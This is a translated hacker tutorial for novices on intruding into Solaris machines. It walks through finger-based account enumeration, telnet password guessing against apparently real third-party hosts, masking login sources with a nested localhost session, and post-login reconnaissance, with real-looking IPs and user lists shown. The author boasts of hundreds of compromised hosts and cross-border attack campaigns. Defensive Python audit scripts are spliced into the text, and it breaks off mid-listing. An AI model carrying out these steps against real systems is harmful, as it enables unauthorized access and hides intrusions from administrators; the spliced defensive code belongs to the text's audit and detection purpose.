UNIX intrusion process (1)
Author's preamble: I said a while ago that I would write a SunOS intrusion tutorial, but I never got round to it, so I'll do it now. Today is a bit boring, so I'll write something. This is my last intrusion tutorial, though. What is the point of hacking back and forth? I think it is better to write some technical analysis articles instead. I hope novices who read my last intrusion tutorial can get something out of it. This is only an introductory tutorial written for novices, not for anyone else.

*** Do not intrude into or damage domestic networks ***

Description: for certain reasons, all IPs involved have been replaced with 192.168.0.*. The systems used are listed below:

192.168.0.1    Windows 2000 Advanced Server
192.168.0.2    Solaris 7 SPARC, GCC
192.168.0.3    Solaris 5.6 SPARC
192.168.0.4    Solaris 8 SPARC
192.168.0.0.20 RedHat 6.2

Note: Solaris is SunOS; the versions map as follows: Solaris 8 = SunOS 5.8, Solaris 7 = SunOS 5.7, Solaris 2.6 = SunOS 5.6, Solaris 2.5 = SunOS 5.5 ... (The platform you use is preferably NT/Win2000/Linux/Unix; here I use Win2000, 192.168.0.1.)

Convention: "(*** text ***)" is an explanation of the command or information on that line.

Tools used:
SuperScan 3.0   http://www.cnhonker.com/tmp/superscan.zip
SecureCRT 3.3   http://www.cnhonker.com/tmp/securecrt3.3.zip
The other programs and code used here can be looked up at http://lsd-pl.net/ or http://www.hack.co.za.

The beginning of the intrusion story: I like to keep my broilers (compromised hosts) on the desktop, and every time I reinstall the system I forget something on the desktop. I remember there was once a list of more than 500 broilers; sometimes I feel sad about it, it's a real pity. M$ is really broken and evil: reinstall the system once more and I lose the list again. Fortunately there weren't many broilers this time, but my GCC box has to be found again, pitiful. If I hadn't reinstalled the system I might not have written this tutorial. Let's go and find a few machines, since I have none to use. Follow me and look for one.
Groundwork: to get a first account, the simplest way is to use finger. (Actually, being thick-skinned is the easiest way. :)) To see which ports are open in a network segment, I'll give you a demonstration. SuperScan 3.0: you can get my personalized 3.0 version at http://www.cnhonker.com/tmp/superscan.zip. (PS: fortunately I have a colleague, Xiao Yan, from whom I got a special version of Streamer. By the way, I'll also advertise his Streamer: I think Streamer is the best tool. I remember in September last year, when I started learning NT/Win2000 attacks, I often used Streamer to sweep network segments. Some people say "lion only knows how to use Streamer"; huh, I haven't used it for a long time, it was last year that I used it a lot.

Now I think the new version of Streamer is very good, with many functions, especially finger detection and password guessing; it is very suitable for new hands, and everyone may wish to try it. The latest version of Streamer can be obtained from Xiao Yan's website: http://www.netxeyes.com. Many people are interested in my personal situation, so here, by the way, is my personal growth experience; don't laugh. In fact it is true: March 8, 2000, went to Guangzhou for an internship, started going online, started learning IE, used email to send and receive mail; April, built a personal website, could only use Trojans; May, started learning SunOS system attacks, at that time privilege escalation was still beyond me, but that month I found a serious vulnerability in www.elong.com's email system that bypassed password verification; June, returned to school to graduate; July, started full-time web design in Guangzhou; August, gained some understanding of SunOS system attacks; September, got my first Win2000 box, used it, and tried attacks with it; October, took up network security work full time; November, Linux, and by then various attack methods against various systems; December, established the Honker Union website. January 2001, went home for Spring Festival; February, organized the Japan campaign; March, slowly lost interest in attacking systems; April, thought about many things; May, organized the counterattack war against the US network, and went to Beijing after it ended; July, a boring month; in July a few big decisions may be made. Two sentences for you: "People must rely on themselves" and "I am me". In fact, both sentences are mine.) I've finished complaining; let's start our study. Oh, slow down: novices should first read the three Unix intrusion tutorials I wrote a few months ago, then continue. Ready? Let's lift the mysterious veil of Unix ... come on baby ...
First day: It was hard to wait until I got off work. :( Open SuperScan 3.0 (if the port list file is not found, click the port settings, choose import, select scanner.lst in the software's own directory, and click Finish). Enter the network segment you want to scan in the IP field; I recommend that each scan covers no more than 10 class C segments. Under scan type select "Show host responses"; if your network is slow, also check "Only scan responsive pings"; select the "All ports from ... to ..." radio button and enter the start and end port in the boxes, both 79, which is the finger port; finally click "Start" to scan. After the scan completes, click "Prune" to drop the hosts without port 79 open, then click "Expand" or "Save" to store the result as a text file and analyze the scan results. We usually see the following common host responses:

1. Line    User    Host(s)    Idle    Location
2. No one logged on.
3. Login    Name    TTY    Idle    When    Where
4. Other response messages, or no content.

Among these, we only look at machines of type 2 and 3. Now we start checking machines by hand, or use Streamer's finger detection. Doing it by hand is actually a trick, but it is hard to explain clearly; here I'll use finger 0@ip to find weak SunOS machines.
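The exposure described above exists only because inetd still offers finger (and the cleartext and trust-based services the later netstat listing shows on ports 21, 512, 513 and 514). The following is an added example, not code from the page or from any of the tools it mentions: a small Python audit of a Solaris-style /etc/inetd.conf that reports which of those services are still enabled and produces the hardened file with them commented out. The sample configuration is constructed.

```python
# Constructed sample in the shape of a Solaris 7 /etc/inetd.conf, covering the
# services the page's reconnaissance relies on (finger 79, ftp 21, telnet 23,
# exec/login/shell 512-514). Not copied from any real host.
SAMPLE_INETD_CONF = """\
# Internet services database (constructed example)
ftp     stream  tcp  nowait  root    /usr/sbin/in.ftpd      in.ftpd
telnet  stream  tcp  nowait  root    /usr/sbin/in.telnetd   in.telnetd
shell   stream  tcp  nowait  root    /usr/sbin/in.rshd      in.rshd
login   stream  tcp  nowait  root    /usr/sbin/in.rlogind   in.rlogind
exec    stream  tcp  nowait  root    /usr/sbin/in.rexecd    in.rexecd
#tftp   dgram   udp  wait    root    /usr/sbin/in.tftpd     in.tftpd -s /tftpboot
finger  stream  tcp  nowait  nobody  /usr/sbin/in.fingerd   in.fingerd
daytime stream  tcp  nowait  root    internal
"""

# Services that hand a remote anonymous user either the account list (finger)
# or a cleartext / .rhosts-based login path. These are what to remove first.
RISKY_SERVICES = {
    "finger": "returns the account list to anyone (finger 0@host)",
    "telnet": "password crosses the network in cleartext",
    "shell":  "rsh: trust based on .rhosts / hosts.equiv",
    "login":  "rlogin: trust based on .rhosts / hosts.equiv",
    "exec":   "rexec: cleartext password",
    "ftp":    "cleartext password",
}

def audit_inetd_conf(text):
    """Return [(service, reason)] for enabled lines whose service is risky."""
    findings = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue                     # blank or commented out: service is off
        service = stripped.split()[0]
        if service in RISKY_SERVICES:
            findings.append((service, RISKY_SERVICES[service]))
    return findings

def harden_inetd_conf(text):
    """Return a copy of the file with every enabled risky service commented out."""
    out = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#") \
                and stripped.split()[0] in RISKY_SERVICES:
            out.append("#" + line)       # inetd re-reads the file on SIGHUP
        else:
            out.append(line)
    return "\n".join(out) + "\n"

if __name__ == "__main__":
    for svc, why in audit_inetd_conf(SAMPLE_INETD_CONF):
        print(f"ENABLED {svc:8s} {why}")
    print(harden_inetd_conf(SAMPLE_INETD_CONF))
```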
The following IPs are replaced with xxx.xxx.xxx.xxx.

-------------------------------------------------- Test --------------------------------------------------
C:\> finger 0@xxx.xxx.xxx.xxx
[xxx.xxx.xxx.xxx]
finger: 0: no such user.
-------------------------------------------------- Test --------------------------------------------------

Failure; this system is probably Linux. Don't be discouraged, we keep looking.

-------------------------------------------------- Test --------------------------------------------------
C:\> finger 0@xxx.xxx.xxx.xxx
[xxx.xxx.xxx.xxx]
Login       Name               TTY         Idle    When    Where
daemon      ???                   <  .  .  .  . >
bin         ???                   <  .  .  .  . >
sys         ???                   <  .  .  .  . >
jeffrey     ???                pts/0                      203.66.149.11
daniel      ???                            437            114cm.kcable.
jamie       ???                              0            203.66.162.68
postgres    ???                pts/2                      203.66.162.80
nsadmin     ???                            768            203.66.19.50
ho          ???                            390            61.169.209.106
house18     ???                pts/1                      203.66.250.1
tong        ???                pts/0                      210.226.42.69
jliu        ???                pts/0                      203.66.52.87
ptai        ???                   <  .  .  .  . >
-------------------------------------------------- Test --------------------------------------------------

This is what we want. :) The first column (jeffrey, daniel, jamie, postgres, ...) holds the usernames on the host; the other columns are login information for each user. Now let's test the password strength of these accounts. (It is best to feed these usernames and some passwords to a guessing tool, but I find that tiring; I used to especially like guessing test:test, oracle:oracle .... and my feel for guessing passwords is not bad.)

-------------------------------------------------- Test --------------------------------------------------
C:\> telnet xxx.xxx.xxx.xxx
SunOS 5.6                  (*** the target system is SunOS 5.6, i.e. Solaris 2.6 ***)
login: ptai                (*** enter the username ***)
Password: ****             (*** enter the password ***)
Login incorrect            (*** login failed ***)
login: jliu
Password:
Login incorrect
login: tong
Password:
Last login: Mon Jul  2 13:21:55 from 210.226.42.69   (*** this user's last login time and source IP ***)
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
You have mail.
$                          (*** hoho~ logged in successfully ***)
$ uname -a                 (*** view the system version and patch information ***)
SunOS dev01 5.6 Generic_105181-19 sun4u sparc SUNW,Ultra-5_10
$ set                      (*** view some system variables ***)
HOME=/export/home/tong
HZ=100
IFS=
LOGNAME=tong
MAIL=/var/mail/tong
MAILCHECK=600
OPTIND=1
PATH=/usr/bin:
PS1=$
PS2=>
SHELL=/bin/sh
TERM=ANSI
TZ=Hongkong
$ gcc
gcc: not found             (*** damn, no compiler; we keep looking for other machines and come back to clean up later ***)
$ telnet localhost         (*** telnet to localhost, so the source IP the user sees at their next login won't raise questions ***)
Trying 127.0.0.1 ...
Connected to localhost.
Escape character is '^]'.

SunOS 5.6

login: tong
Password:
Last login: Wed Jul  4 17:56:09 from 211.99.42.226
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
You have mail.
$ exit
Connection closed by foreign host.
$ exit
Lost connection to the host.
C:\>
-------------------------------------------------- Test --------------------------------------------------

We continue guessing, and after a while we find another one. :) This host's IP is replaced with 192.168.0.2.

-------------------------------------------------- Test --------------------------------------------------
C:\> finger 0@192.168.0.2
[192.168.0.2]
Login       Name               TTY         Idle    When       Where
daemon      ???                   <  .  .  .  . >
bin         ???                   <  .  .  .  . >
dennis      ???                pts/5                         pcd209117.netvig
oracle      ???                pts/5                         o2
qwork       ???                   <  .  .  .  . >
kenneth1    ???                pts/4                         cm61-18-172-213.
wing        ???                pts/6         11  Wed 18:02   office
wilson      ???                pts/11                        203.66.200.90
srini       ???                              363             office
eric        ???                pts/8                         office
render7     ???                               62             211.18.109.186
delex       ???                   <  .  .  .  . >
render9     ???                              023             office

C:\> telnet 192.168.0.2
SunOS 5.7
login: render9
Password:
Login incorrect
login: delex
Password:
*************************************************************************
# The jrun is now replaced by jserv
# to restart the servlet server, please use rs.sh
# However, as the jserv for rel. ....
*************************************************************************
$ w
 6:19pm  up 61 day(s),  3:40,  3 users,  load average: 0.11, 0.07, 0.10
User     tty           login@  idle   JCPU   PCPU  what
root     console       4May01 61days     2      2  /usr/dt/bin/sdt_shell -c ?u
root     pts/4         Fri 4pm  5days               tail -f syslog
delex    pts/7         6:19pm                       w
$ uname -a
SunOS develop 5.7 Generic_106541-14 sun4u sparc SUNW,Ultra-5_10
$ w
 4:44pm  up 62 day(s),  1:45,  3 users,  load average: 0.02, 0.02, 0.02
User     tty           login@  idle   JCPU   PCPU  what
root     console       4May01 62days     2      2  /usr/dt/bin/sdt_shell -c ?u
root     pts/4         Fri 4pm  6days               tail -f syslog
$ gcc
gcc: No input files
-------------------------------------------------- Test --------------------------------------------------

Hao~ Finally a SunOS with a compiler. Now let's find out whether any intruder has been here before us. :)
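On the defender's side, the "telnet localhost" step used on the first host above leaves its own trace: wtmp keeps the original remote session even though the next "Last login ... from" line will show localhost. The following is an added Python example, not part of the original tutorial, that parses `last`-style output (a constructed sample modelled on the page's times and accounts) and flags loopback logins, noting any remote session of the same user that was open just before them. The year is assumed, because `last` prints none.

```python
from datetime import datetime, timedelta
import re

# Constructed sample in the shape of Solaris `last` output, using the account and
# timestamps from the page's telnet session; not real log data.
SAMPLE_LAST = """\
tong      pts/1        localhost        Wed Jul  4 17:56 - 17:57  (00:00)
tong      pts/0        211.99.42.226    Wed Jul  4 17:55 - 17:58  (00:03)
delex     pts/7        211.99.42.226    Wed Jul  4 18:19   still logged in
tong      pts/0        210.226.42.69    Mon Jul  2 13:21 - 13:40  (00:19)
root      console                       Fri May  4 14:39   still logged in
"""

LOCAL_SOURCES = {"localhost", "127.0.0.1", "::1"}
YEAR = 2001   # assumption: `last` prints no year; the page's session is from July 2001

LINE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>\S+)\s+(?P<host>\S+)\s+"
    r"(?P<dow>Mon|Tue|Wed|Thu|Fri|Sat|Sun)\s+(?P<mon>\w{3})\s+(?P<day>\d+)\s+(?P<hm>\d\d:\d\d)"
)

def parse_last(text):
    """Return [(user, tty, host, login_time)] for records that carry a source host."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue           # console logins have no host column and are skipped here
        when = datetime.strptime(f"{YEAR} {m['mon']} {m['day']} {m['hm']}", "%Y %b %d %H:%M")
        records.append((m["user"], m["tty"], m["host"], when))
    return records

def find_loopback_logins(records, window=timedelta(minutes=10)):
    """Flag logins sourced from loopback and list the same user's remote sessions
    that started within `window` before it (the usual sign of a nested session)."""
    findings = []
    for user, tty, host, when in records:
        if host.lower() not in LOCAL_SOURCES:
            continue
        outer = [r for r in records
                 if r[0] == user and r[2].lower() not in LOCAL_SOURCES
                 and timedelta(0) <= when - r[3] <= window]
        findings.append({"user": user, "tty": tty, "at": when.isoformat(),
                         "remote_sources": sorted({r[2] for r in outer})})
    return findings

if __name__ == "__main__":
    for f in find_loopback_logins(parse_last(SAMPLE_LAST)):
        print(f)
```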
-------------------------------------------------- Test --------------------------------------------------
$ ls -al
total 14
drwxrwxr-x   2 delex    staff        512 Jul  4 18:28 .
drwxr-xr-x  35 root     root        1024 May  7 10:46 ..
-rw-r--r--   1 delex    staff        144 May  2 10:46 .profile
-rw-------   1 root     staff        320 Jul  4 18:52 .sh_history
-rw-r--r--   1 delex    staff        124 May  2 10:46 local.cshrc
-rw-r--r--   1 delex    staff        581 May  2 10:46 local.login
-rw-r--r--   1 delex    staff        562 May  2 10:46 local.profile
$ cat /etc/passwd          (*** check /etc/passwd ***)
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
oracle:x:1001:100::/export/home/oracle:/bin/sh
render7:x:9589:101::/export/home/render7:/bin/sh
delex:x:1035:20::/export/home/delex:/bin/sh
ac1:x:3000:300:Agent Client 1:/bin/sh
ac2:x:3001:300:Agent Client 2:/export/home/ac2:/bin/sh
render9:x:9591:101::/export/home/render9:/bin/sh
$ ls -al /                 (*** check whether there are .rhosts or similar files ***)
total 381
drwxrwxrwx  35 root     root        1024 Jun 29 16:52 .
drwxrwxrwx  35 root     root        1024 Jun 29 16:52 ..
-rw-------   1 root     other        152 May  4 14:39 .Xauthority
drwxrwxr-x   4 root     other        512 Feb 20 10:33 .cpan
-rw-------   1 root     root        1032 May  4 14:39 .cpr_config
-rw-r--r--   1 root     other        947 Apr 14  2000 .desksetdefaults
drwxr-xr-x  15 root     other        512 Jun 20 13:09 .dt
-rwxr-xr-x   1 root     other       5111 Apr 13  2000 .dtprofile
drwx------   5 root     other        512 Apr 14  2000 .fm
drwxr-xr-x   2 root     other        512 Apr 13  2000 .hotjava
drwxr-xr-x   4 root     other        512 Mar 14 17:42 .netscape
-rw-------   1 root     other       1024 Dec  8  2000 .rnd
-rw-rw-r--   1 nobody   staff        402 Jun 12 11:14 .svg
drwx------   2 root     other        512 Apr 13  2000 .wastebasket
drwx------   2 root     other        512 Apr 13  2000 Deadletters
drwx------   2 root     other        512 Apr 13  2000 Mail
drwxr-xr-x   2 root     root         512 Apr 13  2000 TT_DB
drwxrwxr-x   2 moluk    other        512 Dec 25  2000 xyiznwsk
lrwxrwxrwx   1 root     root           9 Apr 13  2000 bin -> ./usr/bin
drwxr-xr-x   2 root     nobody       512 Jun 20 13:19 cdrom
-rw-------   1 root     other         77 Jun  7 15:03 dead.letter
drwxrwxr-x  18 root     sys         3584 May  4 14:39 dev
drwxrwxr-x   4 root     sys          512 Apr 13  2000 devices
drwxr-xr-x   9 root     root         512 Jun 12 14:47 disk2
drwxr-xr-x  32 root     sys         3584 Jul  4 18:53 etc
drwxrwxr-x   3 root     sys          512 Apr 13  2000 export
dr-xr-xr-x   1 root     root           1 May  4 14:39 home
drwxr-xr-x   9 root     sys          512 Dec 20  2000 kernel
lrwxrwxrwx   1 root     root           9 Apr 13  2000 lib -> ./usr/lib
drwx------   3 root     root        8192 Apr 13  2000 lost+found
drwxrwxr-x   2 root     sys          512 Apr 13  2000 mnt
dr-xr-xr-x   1 root     root           1 May  4 14:39 net
-rw-rw-r--   1 nobody   staff         13 Feb 20 16:53 newsletteadminmail.ost
drwx------   2 root     other        512 May  6  2000 nsmail
drwxrwxr-x   7 root     sys          512 Apr 28  2000 opt
drwxr-xr-x  12 root     sys          512 Apr 13  2000 platform
dr-xr-xr-x 192 root     root      126912 Jul  4 19:00 proc
drwxrwxr-x   2 root     sys          512 Dec 20  2000 sbin
drwxrwxr-x   2 root     10           512 Feb 15 14:50 snap
drwxrwxrwt   7 sys      sys          986 Jul  4 19:00 tmp
drwxrwxr-x  29 root     sys         1024 May  3 17:32 usr
drwxr-xr-x  26 root     sys          512 Jun 12 14:49 var
dr-xr-xr-x   6 root     root         512 May  4 14:39 vol
drwxr-xr-x   2 wing     10           512 Nov  6  2000 web
dr-xr-xr-x   1 root     root           1 Jul  4 18:55 xfn
$ find / -user root -perm -4000 -exec ls -al {} \;
-r-s--x--x   1 root     bin        19564 Sep  1  1998 /usr/lib/lp/bin/netpr
-r-sr-xr-x   1 root     bin        15260 Oct  6  1998 /usr/lib/fs/ufs/quota
-r-sr-sr-x   1 root     tty       174352 Nov  6  1998 /usr/lib/fs/ufs/ufsdump
-r-sr-xr-x   1 root     bin       856064 Nov  6  1998 /usr/lib/fs/ufs/ufsrestore
---s--x--x   1 root     bin         4316 Oct  6  1998 /usr/lib/pt_chmod
-r-sr-xr-x   1 root     bin         8576 Oct  6  1998 /usr/lib/utmp_update
-rwsr-xr-x   1 root     adm         5304 Sep  1  1998 /usr/lib/acct/accton
-r-sr-xr-x   1 root     bin       643464 Sep  1  1998 /usr/lib/sendmail
....                       (*** the output here is too long; the point is to look for anything left behind by an earlier intruder ***)
$ ps -ef
     UID   PID  PPID  C    STIME TTY      TIME CMD
    root     0     0  0   May 04 ?        0:01 sched
    root     1     0  0   May 04 ?        1:03 /etc/init -
    root     2     0  0   May 04 ?        0:01 pageout
    root     3     0  1   May 04 ?      476:33 fsflush
    root   225     1  0   May 04 ?        0:01 /usr/lib/utmpd
    root   115     1  0   May 04 ?        0:01 /usr/sbin/rpcbind
    root   299     1  0   May 04 ?        0:00 /usr/lib/
    root    52     1  0   May 04 ?        0:00 /usr/lib/devfsadm/devfseventd
    root    54     1  0   May 04 ?        0:00 /usr/lib/devfsadm/devfsadmd
    root   117     1  0   May 04 ?        0:00 /usr/sbin/keyserv
    root   239     1  0   May 04 ?        0:13 /usr/lib/inet/xntpd
    root   142     1  0   May 04 ?        0:11 /usr/sbin/inetd -s
    root   163     1  0   May 04 ?        2:50 /usr/sbin/in.named
    root   164     1  0   May 04 ?        0:01 /usr/lib/automountd
  daemon   153     1  0   May 04 ?        0:00 /usr/lib/nfs/statd
    root   275     1  0   May 04 ?        0:01 /usr/lib/nfs/mountd
    root   152     1  0   May 04 ?        0:00 /usr/lib/nfs/lockd
...
$ netstat -an | grep LISTEN        (*** are there any suspicious ports? ***)
      *.111                *.*                0      0     0      0 LISTEN
      *.21                 *.*                0      0     0      0 LISTEN
      *.514                *.*                0      0     0      0 LISTEN
      *.513                *.*                0      0     0      0 LISTEN
      *.512                *.*                0      0     0      0 LISTEN
      *.540                *.*                0      0     0      0 LISTEN
      *.79                 *.*                0      0     0      0 LISTEN
      *.37                 *.*                0      0     0      0 LISTEN
      *.7                  *.*                0      0     0      0 LISTEN
      *.9                  *.*                0      0     0      0 LISTEN
      *.13                 *.*                0      0     0      0 LISTEN
      *.19                 *.*                0      0     0      0 LISTEN
.......                    (*** the port-by-port check is omitted here; the point is to see whether a bound suid root shell is listening on some port ***)
...
$ cd /tmp
$ ls -al
total 1314
drwxrwxrwt   7 sys      sys          986 Jul  4 19:00 .
drwxrwxrwx  35 root     root        1024 Jun 29 16:52 ..
drwxrwxr-x   2 root     root         176 May  4 14:39 .X11-pipe
drwxrwxr-x   2 root     root         176 May  4 14:39 .X11-unix
drwxrwxrwx   2 root     root         179 May  4 14:39 .pcmcia
drwxrwxrwx   2 root     other        181 Jun 20 13:18 .removable
drwxrwxrwt   2 root     root         327 May  4 14:39 .rpc_door
-rwxrwxr-x   1 root     other        614 May  8 11:17 enctest.class
-rw-------   1 root     other     265936 May  4 14:40 dtdbcache_:
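The two checks the listing above does by eye (setuid-root files that the vendor install does not account for, and listening ports that no configured service explains) are what a host integrity script should do against a baseline. The following is an added Python example, not code from the page, that parses `ls -l` lines in the form produced by the page's `find ... -exec ls -al {} \;` command and Solaris `netstat -an` LISTEN lines; the samples are constructed, with one planted entry of each kind, and the baseline and expected-port set are assumed to come from a trusted build of the same system.

```python
import re

# Constructed samples shaped like the page's `find / -user root -perm -4000 -exec ls -al {} \;`
# and `netstat -an | grep LISTEN` output on Solaris 7. One entry of each kind is planted
# so that the checks have something to flag; none of this comes from a real host.
SAMPLE_SUID = """\
-r-sr-xr-x   1 root     bin        15260 Oct  6  1998 /usr/lib/fs/ufs/quota
-r-sr-sr-x   1 root     tty       174352 Nov  6  1998 /usr/lib/fs/ufs/ufsdump
---s--x--x   1 root     bin         4316 Oct  6  1998 /usr/lib/pt_chmod
-r-sr-xr-x   1 root     bin       643464 Sep  1  1998 /usr/lib/sendmail
-rwsr-xr-x   1 root     other      12345 Jul  4 18:52 /tmp/.X11-unix/.sh
"""
SAMPLE_NETSTAT = """\
      *.111                *.*                0      0     0      0 LISTEN
      *.21                 *.*                0      0     0      0 LISTEN
      *.79                 *.*                0      0     0      0 LISTEN
      *.31337              *.*                0      0     0      0 LISTEN
"""

# Baseline of setuid-root files and the ports inetd/daemons are configured to offer.
# Both are assumed to have been recorded from a trusted install of the same release.
BASELINE_SUID = {"/usr/lib/fs/ufs/quota", "/usr/lib/fs/ufs/ufsdump",
                 "/usr/lib/pt_chmod", "/usr/lib/sendmail"}
EXPECTED_PORTS = {21, 79, 111}

SUID_RE = re.compile(r"^(?P<mode>[-dlrwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+\s+"
                     r"\w{3}\s+\d+\s+[\d:]+\s+(?P<path>\S+)")
LISTEN_RE = re.compile(r"^\s*\*\.(?P<port>\d+)\s+.*\bLISTEN\b")

def unexpected_suid(ls_output, baseline=BASELINE_SUID):
    """Setuid files that are not in the baseline, or that live under /tmp at all."""
    hits = []
    for line in ls_output.splitlines():
        m = SUID_RE.match(line)
        if not m or m["mode"][3] not in "sS":      # position 3 is the owner-execute bit
            continue
        path = m["path"]
        if path not in baseline or path.startswith("/tmp/"):
            hits.append(path)
    return hits

def unexpected_listeners(netstat_output, expected=EXPECTED_PORTS):
    """Listening TCP ports that no configured service accounts for."""
    ports = {int(m["port"]) for m in map(LISTEN_RE.match, netstat_output.splitlines()) if m}
    return sorted(ports - expected)

if __name__ == "__main__":
    print("unexpected setuid-root files:", unexpected_suid(SAMPLE_SUID))
    print("unexpected listening ports  :", unexpected_listeners(SAMPLE_NETSTAT))
```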